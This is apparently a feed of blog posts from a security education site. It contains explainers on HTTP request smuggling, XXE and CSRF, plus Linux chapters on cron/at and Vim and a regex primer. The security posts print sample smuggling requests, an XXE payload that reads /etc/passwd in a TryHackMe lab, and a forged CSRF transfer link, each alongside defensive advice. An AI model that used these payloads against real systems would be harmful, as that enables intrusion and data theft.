Patch The Net - One node at a time - https://patchthenet.com

HTTP Request Smuggling Explained
https://patchthenet.com/articles/http-request-smuggling-explained/
Fri, 31 Dec 2021 15:11:57 +0000

The post HTTP Request Smuggling Explained appeared first on Patch The Net.

HTTP Request Smuggling (HRS) is a type of attack that is gaining more and more attention in recent years. Its rise is fueled by the high prevalence of Cloud-based applications and services.

In this article, we’ll learn the basics of this attack. We’ll see how it works, how to exploit its various forms, and how to protect against it.

Introduction to HTTP Request Smuggling

Before I go ahead and explain what HTTP Request Smuggling is, we should first start with a brief reminder of how the web works and how web pages are loaded in the web browser.

The Web Page Loading Process

So, here is how the process goes:

The Web Page Loading Process
  1. A user types in a web browser the HTTP address to a web page.
  2. The web browser sends an HTTP request to a webserver asking for the requested web page.
  3. The webserver replies with an HTTP response containing the requested page.
  4. Finally, the web browser displays the received content to the user.

This process is simple, and it has been the way the web operated for decades.

Well, it was, for the most part. In recent years, though, this traditional process has become less and less common.

Rather than having direct communication between the client and the webserver, the majority of modern web applications present their content to the user through a chain of HTTP servers.

In addition to the web server that hosts the requested web page, the HTTP communication may also pass through a reverse proxy, a load balancer, a web application firewall, or a caching server. Each of these servers interprets the HTTP header of the requests before forwarding them.

Here is a more realistic representation of how the process works.

The web page loading process through a chain of web servers
  1. A user types in a web browser the HTTP address to a web page.
  2. The web browser sends an HTTP request to the front-end web server asking for the requested web page.
  3. After processing the request, the front-end web server forwards it to the back-end server.
  4. The back-end server replies with an HTTP response containing the requested page, which the front-end server relays back to the browser.
  5. Finally, the web browser displays the received content to the user.

In this case, the front-end web server sends many requests to the back-end server, often reusing the same connection. So, how does the back-end server know where one HTTP request ends and another one begins?

Thankfully, the HTTP protocol specification has defined two ways for marking the end of an HTTP request.

Determining the end of HTTP requests

Content-Length

The Content-Length Header contains the length in bytes of the message body.

POST / HTTP/1.1
Host: target-website.com
Content-Length: 18

Malicious request

The content length in the above example is 18, which is the number of bytes (characters) contained in the body of the request (17 characters in Malicious request and one character for the new line).

Transfer-Encoding

When the request contains the Transfer-encoding header with a value of chunked, this means that the body of the request contains one or more chunks of data. Each chunk starts with a hexadecimal value that specifies its length and ends with a newline. The webserver understands that it has reached the end of the message body once it encounters a chunk containing the value of zero.

POST / HTTP/1.1
Host: target-website.com
Transfer-Encoding: chunked

11
Malicious request

0

The above HTTP request contains one chunk, marked by the hexadecimal value 11 (17 in decimal), which is the length in bytes of Malicious request. The request then ends when the webserver reaches the zero-length chunk. After this, the webserver will start processing the following request.
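To make the arithmetic concrete, here is a small Python sketch (my own illustration, not part of the original article) that wraps a message body in chunked transfer encoding, using the same hexadecimal length prefix described above. For a 17-byte body, that prefix is the hexadecimal value 11.

```python
def to_chunked(body: str) -> str:
    """Encode a body as a single HTTP chunk followed by the terminating
    zero-length chunk, per the chunked transfer encoding rules."""
    # Each chunk: hex length, CRLF, data, CRLF; a "0" chunk ends the body.
    return f"{len(body):x}\r\n{body}\r\n0\r\n\r\n"

encoded = to_chunked("Malicious request")
```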

By having two ways to handle HTTP requests, a big problem arises: What if the two servers do not use the same technique for delimiting HTTP requests?

In this case, the front-end server may forward a request that contains another, hidden, request to the back-end server. You can see how problematic this could be. Well, this is what we call HTTP Request Smuggling.

A malicious request may reach the backend web server without being processed by the frontend server.

Types of HTTP Request Smuggling Attacks

Now that we have seen how HTTP Request Smuggling attacks work, let’s start exploring the different forms of the attack.

CL.TE

When the front-end server uses Content-Length and the back-end server uses Transfer-Encoding, an attacker can send the following payload to smuggle the malicious request to the back-end server:

POST / HTTP/1.1
Host: target-website.com
Transfer-Encoding: chunked
Content-Length: 21

0

Malicious request

The front-end server will treat the above message as a single request and pass it along to the next server. However, when the back-end server receives this request, it will handle it as two different requests, separated at the line that contains 0.

HTTP Request Smuggling CL.TE
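The desync can be simulated in a few lines of Python. This hedged sketch (mine, not from the article) parses the same body both ways, once honouring Content-Length and once honouring chunked encoding; it uses CRLF line endings, so byte counts differ slightly from the newline-only counting used earlier.

```python
def read_by_content_length(data: bytes, length: int):
    """Front-end view: the body is exactly `length` bytes long."""
    return data[:length], data[length:]

def read_by_chunked(data: bytes):
    """Back-end view: consume chunks until the zero-length chunk."""
    consumed, rest = b"", data
    while True:
        size_line, rest = rest.split(b"\r\n", 1)
        size = int(size_line, 16)
        if size == 0:
            # terminating chunk; a trailing CRLF ends the body
            if rest.startswith(b"\r\n"):
                rest = rest[2:]
            return consumed, rest
        consumed += rest[:size]
        rest = rest[size + 2:]  # skip the chunk data and its trailing CRLF

# The body of the CL.TE payload: a zero-length chunk, then the smuggled text.
body = b"0\r\n\r\nMalicious request"

# The front-end forwards everything, because Content-Length covers the body...
forwarded, _ = read_by_content_length(body, len(body))
# ...but the back-end stops at the "0" chunk, leaving the rest unconsumed.
_, smuggled = read_by_chunked(body)
```

The leftover bytes sit at the front of the connection buffer, so the back-end prepends them to whatever request arrives next.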

TE.CL

When the front-end server uses Transfer-Encoding and the back-end server uses Content-Length, an attacker can send the following payload to smuggle the malicious request to the back-end server:

POST / HTTP/1.1
Host: target-website.com
Transfer-Encoding: chunked
Content-Length: 4

11
Malicious request

0

In this situation, the front-end server processes the request based on the Transfer-Encoding header, and so it forwards the entire request to the back-end server.

When the back-end server receives the request, it sees that the Content-Length is 4 bytes, so it stops processing the request at the end of the chunk-size line, right before the line containing Malicious request. It then treats everything that comes next as a new request.

HTTP Request Smuggling TE.CL
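The same split can be sketched for TE.CL. In this hypothetical Python illustration, the back-end honours a Content-Length of 4 bytes, which covers exactly the chunk-size line, so everything after it looks like a fresh request:

```python
# Full chunked body forwarded by the front-end; the prefix is the
# hexadecimal length of "Malicious request" (17 bytes -> 0x11).
prefix = f"{len('Malicious request'):x}\r\n".encode()
body = prefix + b"Malicious request\r\n0\r\n\r\n"

# The back-end honours Content-Length: 4, consuming only the chunk-size
# line; the remainder is treated as the beginning of the next request.
consumed, leftover = body[:4], body[4:]
```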

TE.TE

When both servers use Transfer-Encoding, they can differ in the way they interpret the header.

For instance, the following header lines can be handled differently depending on the presence of space and tab characters:

Transfer-Encoding: chunked
Transfer-Encoding : chunked
 Transfer-Encoding: chunked
Transfer-Encoding[Tab]:chunked

The options are endless here, but you can see now how the vulnerability can still be present even if the two servers agree on the Transfer-Encoding as a way to separate requests.
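The disagreement can be simulated with two toy header parsers, one strict and one lenient (both hypothetical, for illustration only): any variant that one server recognizes as chunked while the other does not gives an attacker a desync to work with.

```python
def strict_is_chunked(header_line: str) -> bool:
    """A strict server: the header must match exactly."""
    return header_line == "Transfer-Encoding: chunked"

def lenient_is_chunked(header_line: str) -> bool:
    """A lenient server: trims whitespace around the name and the value."""
    name, _, value = header_line.partition(":")
    return (name.strip().lower() == "transfer-encoding"
            and value.strip().lower() == "chunked")

variants = [
    "Transfer-Encoding: chunked",
    "Transfer-Encoding : chunked",
    " Transfer-Encoding: chunked",
    "Transfer-Encoding\t:chunked",
]

# Only the first variant satisfies the strict server, while the lenient
# server accepts all four -- three exploitable disagreements.
disagreements = [v for v in variants
                 if lenient_is_chunked(v) != strict_is_chunked(v)]
```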

Preventing HTTP Request Smuggling Attacks

You can prevent HTTP request smuggling by following certain good practices.

  • Use HTTP/2 for communication between the front-end and back-end servers.
  • The back-end server should reject all ambiguous requests.
  • When possible, use the same web server software for both the front-end and back-end servers (Apache, Nginx, IIS…). Of course, this won’t always be possible, as front-end servers are often hardware appliances that do not offer options for customization.
  • Use a Web Application Firewall (WAF) that provides protection against HTTP Request Smuggling attacks.

XXE Attacks Explained
https://patchthenet.com/articles/xxe-attacks-explained/
Sun, 12 Dec 2021 15:12:09 +0000

The post XXE Attacks Explained appeared first on Patch The Net.

Out of the many attacks that threaten web applications today, XXE remains one of the least talked about. Although it gets far less attention than XSS or SQL injection, it carries its own risk and should not be taken lightly.

In this guide, I will try to explain what XXE is, why it is dangerous, and how to protect against it. But, before we can learn about this attack, we would first need to understand a few things about XML.

XXE Attacks

Introduction to XML

XML (eXtensible Markup Language) is a tag-based language that applications use for transferring data. Contrary to other tag-based languages (like HTML), XML does not have pre-defined tags. Instead, these are defined by the user.

Here is an example of an XML code:

<email>
<sender>John</sender>
<recipient>Peter</recipient>
<subject>Hi</subject>
<message>Hi Peter, How are you doing?</message>
</email>

In the above code, the email tag contains 4 child tags: sender, recipient, subject, and message. Each of these tags encloses a string of characters, referred to in XML as parsed character data (or PCDATA).

XML File Declaration

An XML file should start with an XML declaration. At a minimum, this includes the version of XML that the file uses; the encoding and standalone attributes are optional.

Here is what an XML file declaration looks like:

<?xml version="1.1" encoding="UTF-8" standalone="yes"?>

As you can see, there are three different attributes:

  • version : This can either be 1.0 or 1.1. If you do not write an XML declaration, then the version defaults to XML 1.0.
  • encoding : In most cases, you will be using UTF-8. However, depending on the characters used, you can specify UTF-16 for this attribute.
  • standalone : This attribute can take either yes or no. A value of yes indicates that the document does not depend on external markup declarations (such as an external DTD).

Document Type Definition (DTD)

DTD (Document Type Definition) defines the structure of an XML document so that different people can agree on the same elements and attributes to use.

There are two different types of DTDs:

Internal DTD

When an XML document includes the definition of its own structure, that definition is what we refer to as an internal DTD. It is contained in the tag <!DOCTYPE> that is written at the beginning of the file, just after the XML declaration.

Here is an example of an internal DTD:

<!DOCTYPE email [
<!ELEMENT email (sender,recipient,subject,message)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT recipient (#PCDATA)>
<!ELEMENT subject (#PCDATA)>
<!ELEMENT message (#PCDATA)>
]>

With !DOCTYPE email, we define email as the root element of the XML document.

The second line specifies that the email element should contain four child elements: sender, recipient, subject, and message.

After that, we specify that each of these child elements should contain parsed character data (PCDATA).

You have probably noticed that this DTD defines the same structure that we’ve seen in the previous XML code example.

External DTD

Now for this second type, we define the XML structure in an external file. In this case, the <!DOCTYPE> tag should contain the URL to the DTD file using the SYSTEM keyword.

We need to add the following line to the beginning of our XML document, just after the XML declaration line.

<!DOCTYPE email SYSTEM "email.dtd">

And here is what the external DTD file “email.dtd” contains:

<!ELEMENT email (sender,recipient,subject,message)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT recipient (#PCDATA)>
<!ELEMENT subject (#PCDATA)>
<!ELEMENT message (#PCDATA)>

Here again, DTD defines the same structure as in the examples we’ve seen before.

XML Entity

An XML entity is a string of characters that the XML parser replaces with another value when encountered in the document. This is similar to what variables are in programming languages.

An entity is written in the form: Ampersand (&) + name of entity + semi-colon (;).

In addition to user-defined entities, there are many built-in entities. Examples include &lt; and &gt;, which get replaced with the less-than (<) and greater-than (>) characters respectively.

Similar to DTDs, there are two types of entities: Internal and external.

Internal Entities

An internal entity is defined in the following form:

<!ENTITY name "value">

Whenever there is a &name; in the file, the XML parser replaces it with value.
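Entity substitution is easy to observe with Python's standard-library parser (a minimal sketch of my own, not from the article; the underlying expat parser expands internal entities declared in the internal DTD subset):

```python
import xml.etree.ElementTree as ET

# An internal DTD that defines the entity "name" with the value "value";
# the parser substitutes &name; while parsing the document.
doc = """<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY name "value">
]>
<note>&name;</note>"""

root = ET.fromstring(doc)
# root.text now holds the substituted string "value"
```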

External Entities

On the other hand, instead of providing a value, an external entity refers to a URL using the SYSTEM keyword.

<!ENTITY name SYSTEM "URL">

Similar to an internal entity, whenever a parser encounters a &name; in the XML file, it replaces it with the content of the URL that the external entity declaration refers to.

Introduction to XXE

XXE (XML eXternal Entity) is a type of attack that takes advantage of external entities in XML files.

Some websites rely on XML for transferring data between the browser and the webserver. When it receives data in XML, the webserver transmits it to an XML parser which processes this data.

XXE Attack Process

As we’ve seen in the previous section, XML external entities are not a vulnerability on their own. Like any other XML feature, they are an inherent part of the language. An XML parser will therefore, by default, interpret them and load the external content that they reference. This, of course, can be prevented with some secure configuration practices, which we will cover later in this article.

Now, a malicious user can take advantage of this XML feature by defining external entities that retrieve sensitive files from the server side, thereby exploiting a vulnerable XML parser.

Let’s see how this works with a simple example.

XXE Attack Example

To demonstrate the impact of an XXE attack, we are going to use an example taken from the Mustacchio room on TryHackMe.

As shown in the image below, we have at our disposal a form input to add a comment on the website.

With the proxy interception enabled on Burp Suite, I have typed Hello and submitted the form.

On Burp Suite, I have intercepted the following request.

We can see that the web application stores the “Hello” value in a variable named xml. This hints at the possibility that it can accept XML code as an input.

After doing some enumeration, I have managed to get the correct XML structure for adding a comment, which is as follows:

<comment>
<name>Name</name>
<author>Author</author>
<com>Comment</com>
</comment>

So, with that in mind, let’s change the xml parameter value to the following code:

<?xml version="1.0"?>
<!DOCTYPE payload [ 
<!ENTITY malicious SYSTEM "file:///etc/passwd">
]>
<comment>
<name>&malicious;</name>
<author>Barry</author>
<com>The comment</com>
</comment>

The payload shouldn’t be difficult to understand. We have defined malicious as an external entity whose value is the content of the file /etc/passwd, referenced through the file:// scheme.

When the XML parser arrives at &malicious;, it will load the content of /etc/passwd in its place, thus revealing sensitive information from the webserver, as the following image shows.

How to Prevent XXE Attacks

Fortunately, XXE attacks aren’t always effective. Their success requires the target website to be misconfigured. So, by making sure that our websites don’t have these poor configuration settings, we can mitigate the risk of XXE attacks.

Here are some of the good practices that we can implement to achieve this.

  • Disable DTDs and external entities in the XML parser.
  • Always validate and sanitize all user-provided input before processing it.
  • Regularly patch and update XML parsers.
  • Scan the web application using SAST and DAST tools.
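As one crude illustration of the input-validation practice, an application could refuse any submitted XML that declares a DTD or defines entities before it ever reaches the parser. This helper is hypothetical and is no substitute for disabling DTD processing in the parser itself:

```python
def reject_dtd(xml_text: str) -> str:
    """Crude pre-parse check: refuse any document that declares a DTD
    or defines entities, since XXE payloads need them."""
    lowered = xml_text.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        raise ValueError("DTDs and entity definitions are not allowed")
    return xml_text

safe = "<comment><name>Barry</name></comment>"
evil = ('<!DOCTYPE payload [<!ENTITY malicious SYSTEM '
        '"file:///etc/passwd">]><comment>&malicious;</comment>')

blocked = False
reject_dtd(safe)          # passes through unchanged
try:
    reject_dtd(evil)
except ValueError:
    blocked = True        # the XXE payload is rejected before parsing
```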

Conclusion

So, we have reached the end of this article. We’ve started by learning about XML, entities, and DTDs. We’ve then learned about XXE attacks, and how they are performed. Then, we’ve seen an example of an XXE attack using the TryHackMe room. We’ve also listed some of the good practices to follow to prevent these attacks from happening.

With all that, we’ve barely scratched the surface of XXE attacks and their impact. There are many other variants of this attack, from denial of service to sensitive information disclosure. There is still a lot to learn, and I invite you to keep reading about this. OWASP’s resources on XXE are a good next step for learning more about the topic.

Chapter 11 – Schedule Tasks
https://patchthenet.com/tutorials/linux/chapter-11-schedule-tasks/
Sat, 04 Dec 2021 10:57:06 +0000

The post Chapter 11 – Schedule Tasks appeared first on Patch The Net.

We have learned a lot since we started this tutorial. We are starting to gain more confidence in operating a Linux system.

However, so far, we have been limited to running manual commands. In other words, we have to manually type in commands and press enter in order to execute a task. Having to rely solely on this manual task execution can limit our ability to administer a Linux system. Often, we would need to schedule certain tasks (or jobs, as we call them) automatically at a predetermined time or interval without having to run them manually.

This chapter will introduce you to two Linux command-line utilities that will allow you to do just that.

Schedule Tasks to Run Once

The first command we are going to cover in this chapter is at.

This is a Linux command-line utility that allows you to schedule certain tasks to run only once at a certain time and date.

Installing the command

To start using at, first run it with no arguments: if the shell reports that the command is not found, then at is not installed on your system.

If it is not installed, then you can simply install it using your distribution’s package manager. For instance, if you’re running Linux Mint, Ubuntu, or any Debian-based distro, then simply run the following command:

sudo apt-get install at

Schedule a Task

The syntax for running at is as follows:

at [OPTIONS] runtime

If you want to schedule a job to run at a certain time, then you can specify the time as an argument to at as the above syntax shows.

You can specify time in the form of HH:MM or using the am/pm suffixes. You can also specify the date in the form of MMDDYY.

Then, once you press Enter and the command is run, you should find yourself on a command prompt that starts with at>. You can then start typing the commands that will be part of the job that you want to schedule. When you’re done typing all the commands, just press Ctrl-D and that should bring you back to your normal command prompt.

schedule tasks using at

You can use at with the -l option to list all your pending jobs, and you can remove a job using the -r option followed by the number of the job to remove.

list and remove scheduled jobs with at

Schedule Tasks to Run Periodically

Cron is a Linux utility that will allow you to run tasks on a predetermined schedule, instead of always having to run every task manually in real-time.

Backup Case

Let’s say that you want to back up your website every day at 3 am. One way to do this is to wake up every night at 3 and manually run the backup command, which might be something like this:

$ cp -r /website/ /websitebackup/

Well, you can see how cumbersome that can be. Thankfully, this is where Cron jobs come in. They allow you to run a task on a schedule. For our case, all we have to do is create a Cron job that runs the above command every day at 3 am.

Cron Table

Now that we know that the cron utility is what allows us to schedule tasks, let’s try and create a Cron Job.

You can view and add Cron jobs in configuration files called crontabs (short for Cron Tables). There is one particular crontab that is general and that you can use to schedule system-wide jobs. This special file is located at /etc/crontab and follows a standard structure.

Every line in this file defines a job. Here is the structure of a job definition:

crontab job definition

As the image above shows, there are seven columns in total. The first five represent the date and time when to run the job. The sixth column is the user that the task will be run as. Finally, the last column contains the command that will run in this job.

Time and Date

In order to define the time and date, here is something to keep in mind.

When the asterisk symbol (*) is given for a column, then that column will match all its possible values. For example, if we keep an asterisk (*) in the hour field, this means that every hour is a match.

If, however, we give the hours column the value of 7, then it will only match 7 am.

Back to our Case

Before we move on, let’s go back to our example.

Here is the job definition that will run our backup command every day at 3 am.

0 3 * * * user cp -r /website/ /websitebackup/

You should now be able to understand the above line on your own. If you are having difficulties, you can re-read this chapter before moving on.
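The matching rules for asterisks and numbers can be sketched in a few lines of Python (a simplified illustration of my own; real cron also supports ranges, lists, and step values in each field):

```python
def cron_matches(spec: str, minute: int, hour: int,
                 day: int, month: int, weekday: int) -> bool:
    """Return True if the five time fields of `spec` match the given moment.
    Only bare numbers and "*" are supported in this simplified sketch."""
    fields = spec.split()[:5]
    values = [minute, hour, day, month, weekday]
    return all(f == "*" or int(f) == v for f, v in zip(fields, values))

# "0 3 * * *" matches 03:00 on any day, but not 03:01 or any other hour.
print(cron_matches("0 3 * * *", 0, 3, 15, 6, 2))   # True
print(cron_matches("0 3 * * *", 1, 3, 15, 6, 2))   # False
```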


It is important to fully understand all that we have covered so far in this tutorial. In the next chapters, we will be discussing bash scripting, which is different from what we have covered so far, and a bit more challenging. So, if you feel that there is a chapter that you didn’t fully grasp, I invite you to go back and re-read it. This way, we can all be on the same page when we embark on the next phase.

CSRF (Cross-Site Request Forgery) Explained
https://patchthenet.com/articles/csrf-cross-site-request-forgery-explained/
Sun, 28 Nov 2021 11:05:08 +0000

The post CSRF (Cross-Site Request Forgery) Explained appeared first on Patch The Net.

Cross-Site Request Forgery (CSRF or XSRF) is a type of attack that targets web applications. It allows an attacker to induce users into inadvertently performing state-changing actions on a website.

In this article, we are going to explain how CSRF attacks work, why they pose a threat to web applications, and what security safeguards we can implement to protect our websites against them.

How does a CSRF attack work?

A CSRF attack targets users that are authenticated to a vulnerable website. Through this attack, an attacker can take the identity of a user and perform an action on their behalf. These actions will then appear to the website as if they were performed by the legitimate user.

To better understand how the process works, let’s consider the following scenario.

CSRF Process

Let’s say that a legitimate user is authenticated to their bank’s website. Now, let’s assume that this website is vulnerable to CSRF. A user can send money to other users from their account by accessing the following link:

www.bank.com/transfer.php?to=recipient&amount=1000

An attacker can forge a link that would make the logged-in user send them money. This link will look something like this:

www.bank.com/transfer.php?to=attacker&amount=1000

The attacker can then induce the legitimate user to access this link by sending it through a phishing email, or through another malicious website that the attacker controls.

Once the user clicks on the link, $1,000 will get transferred from the victim’s account to the attacker.

This is just one example of the many CSRF attack scenarios. Other examples include password resets, items added to a shopping cart, or changes made to account details. All that without the user’s knowledge.

GET vs POST

In this example, the website allows state-changing operations using the GET method. Such websites are a gold mine for a malicious actor: since the GET method carries its parameters in the URL, the attacker only has to send a forged link to a legitimate user, as we did here.

For this reason, using the POST method for state-changing operations is preferable. It does not include parameters in the URL, and it requires a form to send them.

The POST method is not entirely immune to CSRF, however; it just adds another step for the attacker and complicates the delivery process. Instead of delivering a simple link, the attacker has to create an HTML page with a form that submits the malicious request to the victim’s website.
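To see why POST only complicates delivery rather than preventing it, here is a hypothetical Python sketch that generates the kind of self-submitting HTML form an attacker would host, reusing the bank-transfer URL and parameters from the earlier example:

```python
def csrf_post_poc(action_url: str, fields: dict) -> str:
    """Build a self-submitting HTML form, the typical delivery vehicle
    for a CSRF attack against a POST endpoint."""
    inputs = "\n".join(
        f'  <input type="hidden" name="{name}" value="{value}">'
        for name, value in fields.items()
    )
    return (
        f'<form id="f" method="POST" action="{action_url}">\n'
        f"{inputs}\n"
        "</form>\n"
        "<script>document.getElementById('f').submit();</script>"
    )

poc = csrf_post_poc("https://www.bank.com/transfer.php",
                    {"to": "attacker", "amount": "1000"})
```

A victim's browser visiting a page containing this markup would submit the form immediately, with the victim's session cookie attached.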

Web developers should not rely solely on the POST method as the solution to the problem; we will discuss more effective controls against CSRF later in this article.

Causes

As the above process shows, what makes this attack vector possible is the trust that the website has in the browser.

When a user logs in, the website starts a session and provides the associated cookie to the user’s browser. From then on, the browser will include this cookie in all future requests. The website then trusts all requests originating from that browser.

Now, when a user with an active session receives a forged link from an attacker, and they click on it, the browser will include the user’s cookie with the request and the website will see that the request originates from a legitimate user with an active session.

Impact

The impact of CSRF can be devastating for any organization having a website that is vulnerable to this attack. They might have their reputation tarnished, users may become mistrustful of them, and they may even run the risk of incurring regulatory fines.

In addition to attacks targeting end users, an attacker can use CSRF against users with privileged accounts, such as admins. When successful, this might give the attacker control over the entire web application.

All these are reasons enough to implement good practices to protect against CSRF attacks.

How to protect against CSRF?

Thankfully, your website doesn’t have to be vulnerable to this attack. There are some good practices that you can implement if you want to protect your website against CSRF.

Some of these good practices include:

  • A website should not permit state-changing operations based on GET requests.
  • Always limit session duration for connected users. Websites should terminate sessions whenever users leave the website.
  • Cross-Site Scripting (XSS) prevention controls should also be implemented, since XSS can be used to exploit CSRF.

More importantly, there are two main controls that can help prevent CSRF attacks against a website: CSRF tokens and the SameSite cookie attribute.

CSRF Tokens

Use anti-CSRF tokens with every request that changes a state on the website. The web application should generate these tokens on the server side, and their values should be unpredictable. If a malicious user attempts a CSRF attack, they will not be able to change a state on the website, since their request would need to include the associated token, which they do not know.
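Token generation and verification can be sketched with Python's standard library (an illustrative snippet, not a full framework integration; in practice the token would be stored in the user's session and embedded in each form):

```python
import hmac
import secrets

def issue_csrf_token() -> str:
    """Generate an unpredictable per-session token on the server side."""
    return secrets.token_urlsafe(32)

def verify_csrf_token(stored: str, submitted: str) -> bool:
    """Constant-time comparison avoids leaking the token through timing."""
    return hmac.compare_digest(stored, submitted)

token = issue_csrf_token()
print(verify_csrf_token(token, token))      # True
print(verify_csrf_token(token, "forged"))   # False
```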

SameSite Cookie

The SameSite cookie attribute prevents cookies from being sent in cross-site requests. A website should set SameSite to Lax or Strict in its Set-Cookie response header. This prevents the browser from sending the session cookie with requests originating from other websites.
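Here is a short sketch of how such a response header might be built with Python's http.cookies module (the samesite attribute requires Python 3.8+; Secure and HttpOnly are added as general good practice, not something the article prescribes):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["samesite"] = "Strict"
cookie["session"]["httponly"] = True
cookie["session"]["secure"] = True

# The attribute string the server would place in its Set-Cookie header:
print(cookie["session"].OutputString())
```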


This article was just a brief introduction to Cross-Site Request Forgery (CSRF). It should be your first step in the topic. If you wish to learn more, you can check OWASP’s page about this attack.

Chapter 10 – Vim
https://patchthenet.com/tutorials/linux/embracing-the-power-of-linux/chapter-10-vim/
Thu, 25 Nov 2021 17:29:00 +0000

The post Chapter 10 – Vim appeared first on Patch The Net.

After having spent time learning the most important commands that we need to perform essential tasks on Linux, you should realize by now that using the command line interface on its own has its limitations.

We cannot write scripts, change configuration files, or automate tasks directly from a prompt. For this, we have to venture beyond the CLI and into a text editor; more precisely, into Vim.

Vim isn’t your typical Notepad, so don’t take this chapter lightly.

First Steps With Vim

Vim is available in almost all Linux distributions, so in most cases you won’t have to install it on your machine.

However, in some cases, especially when you have a lightweight distro, Vim may not be readily available to you by default. In that case, you can still install it using your distribution’s package manager.

For instance, if you are running a Debian-based distribution, then you can simply run sudo apt-get install vim and that should do it.

Starting vim

To open Vim, simply type the vim command, followed by the file that you want to edit.

$ vim myfile.txt

If the provided filename does not exist, Vim will open a new empty buffer, and the file will be created once you save it.

This is what you should see when you run the above command:

Vim

Quitting Vim

Now, before we start typing and editing text, the first and most important thing you need to know about Vim is how to exit from it.

And no, we are not going to close it using the X button at the top right of the window. This isn’t the right way to do it. Besides, this option is only possible in graphical desktop environments. And in many cases, you might find yourself using Vim in a non-graphical terminal, in which there are no windows, and therefore no X buttons.

So, to exit from Vim gracefully, press the colon key followed by q (as in quit): :q. You should see the keys that you’re typing at the bottom of your screen, as shown below.

After that, simply press enter, and you should be out of Vim and back to your command line prompt.

With the above command, the changes you made to the file will not be saved. If you wish to save and exit, then instead of :q, you should type :wq, which combines :w (as in write) and :q.

Vim modes

Note that when you typed :q in the previous example, it did not get inserted in the content of the file as you would expect from a text editor.

This is because you can only type directly in the content of a file in Vim when you are in the insert mode. But Vim opens by default in the normal mode.

So, when Vim is in normal mode, you cannot type directly into the file, but you can do a lot of other things, like navigating within its content using certain key presses.

To move from normal mode to insert mode, press the i key. And, whenever you want to go back to normal mode (not just from insert mode, but from any other mode), simply press the escape key Esc.

Now, when you are in normal mode and you press the colon key :, you switch to command mode. This is what we did in our previous example: when we typed :q (or :wq), we first switched to command mode by pressing the colon, and then ran the command q to exit from Vim.

To summarize this section, we have learned about three modes in Vim: The Normal, Insert, and Command Modes. There are other modes of course, but for now, let’s focus on these, and we’ll get the chance to cover the others later in this chapter.

Insert Mode

As mentioned earlier, you can access the insert mode by pressing the i key. Once you’re there, you can edit your text directly as you would do with a normal text editor.

Insert Mode

You can go back anytime to the normal mode by pressing the escape key Esc.

Normal Mode

Move the Cursor

Now, say we have a file with a lot of text. In a graphical environment, we can easily navigate within this file using the mouse. However, this option is not a possibility with Vim. So, how do we go about navigating and moving the cursor in this case?

Thankfully, the normal mode allows us to navigate easily by pressing certain keys:

  • j : Move the cursor down one line.
  • h : Move the cursor left one character.
  • k : Move the cursor up one line.
  • l : Move the cursor right one character.
  • w : Move the cursor to the next word.
  • b : Move the cursor to the previous word.
  • 0 : Move the cursor to the beginning of the current line.
  • $ : Move the cursor to the end of the current line.

For most of these keys, you can press a numeric key before them to have them applied several times. For instance :

  • 5j : Move the cursor down 5 lines.
  • 4h : Move the cursor left 4 characters.
  • 3w : Move the cursor forward three words.
  • 3b : Move the cursor back three words.

Undo/Redo

You can undo a previous change by pressing the u key. To do the opposite and redo what you've undone, simply press ctrl+r.

Changing text in normal mode

Although the insert mode is where you can edit the text of a file by typing directly into it, you can still apply some changes to the text while being in the normal mode.

You can use x to delete the character at the current position of the cursor, or you can replace it by pressing r followed by the character you wish to replace it with.

You can use the delete command d, followed by another character to delete a single word, line, or more:

  • dd : Delete the current line.
  • 5dd : Delete 5 lines, starting from the current one.
  • dw : Delete the current word.
  • 4dw : Delete 4 words, starting from the one under the cursor.
  • d$ : Delete all text from the current position of the cursor to the end of line.
  • d0 : Delete all text from the beginning of line to the current position of the cursor.

Note that text removed with the delete command gets stored in one of Vim's internal registers (its equivalent of a clipboard). In other words, deleting is similar to cutting. So, after deleting text with one of the above commands, you can paste it by pressing p.

Speaking of copy and paste, you'll surely want to know how to copy text in Vim without removing it. For this, you first have to select the portion of text that you want to copy, and then press y.

Well, that would be simple if only we had a mouse to select text with. In our case, we have something else: The Visual Mode.

Visual Mode

If you want to select text in order to copy or delete it, press v first. This puts you in the visual mode, where you can adjust your selection by pressing the same keys used for navigation in the normal mode.

Once you are satisfied with your selection, you can then either delete it by pressing d, or just copy it using y.

Visual Mode

Replace Mode

The replace mode allows you to replace text by typing directly over it. You can access the replace mode by pressing the R key. Once again, when you’re done replacing the text that you want, you can go back to the normal mode by pressing the escape key.


If you’ve reached this far, then you should now have the basic knowledge to start using Vim. Now, your next step should be to practice.

Keep in mind that it is only after you have spent hours with this text editor that you can truly grasp its utility. At first, you might find yourself editing text at a slower pace than you're used to. But once you get over the learning curve, you will be surprised at how fast you can edit text.

The post Chapter 10 – Vim appeared first on Patch The Net.

A Quick Guide To Regular Expressions

Regular expressions are present in almost all programming languages (Python, PHP, Javascript…), as well as in Linux commands (grep, sed…) and in many other high-level languages and applications.

So, why are they so widely present? What exactly are they used for? And how can we start using them ourselves?

Before we go ahead and address these questions, I am going to start by addressing the elephant in the room and answering the first question that is probably on your mind.

What are Regular Expressions?

A regular expression (or Regex) is a string of characters that specifies a search pattern. It is often used to match text while performing “find” and/or “replace” operations.

I know this definition might be confusing, which makes regular expressions quite difficult to understand at first. But don’t worry, you’ll soon grasp their utility as we progress through this article, in which we are going to learn how to read and write regexes, starting from simple and short examples to more advanced patterns.

Why use Regular Expressions?

You might have used wildcards before in your search queries. For instance, when searching for *.html, you can retrieve all files that end with .html.

Well, regular expressions work in a similar way, except that they are more powerful and allow for more advanced text filtering options.

When it comes to learning new concepts, examples are a lot more effective than mere definitions. So, here you go. These couple of examples should help you better understand why we use regular expressions.

  • Example 1 : To validate email addresses
\b[a-zA-Z0-9_.+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}\b
  • Example 2 : To validate phone numbers
^\+?([0-9]{1,3})?\s?\(?[0-9]{3}\)?[-\s.]?[0-9]{3}[-\s.]?[0-9]{4,6}$
  • Example 3 : To validate IP addresses
\b[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\b

I can already see the confusion in your eyes. But hey, rest assured, this isn't gibberish. In fact, I'd bet that by the end of this article, you will be able to read and understand what these expressions mean.

As you can see, by using the above examples, we can check if a certain string is an email address, a phone number, or an IP address. And these are not the only things that you can validate. Once you learn how to write regular expressions, you will be able to check for literally any type of string.

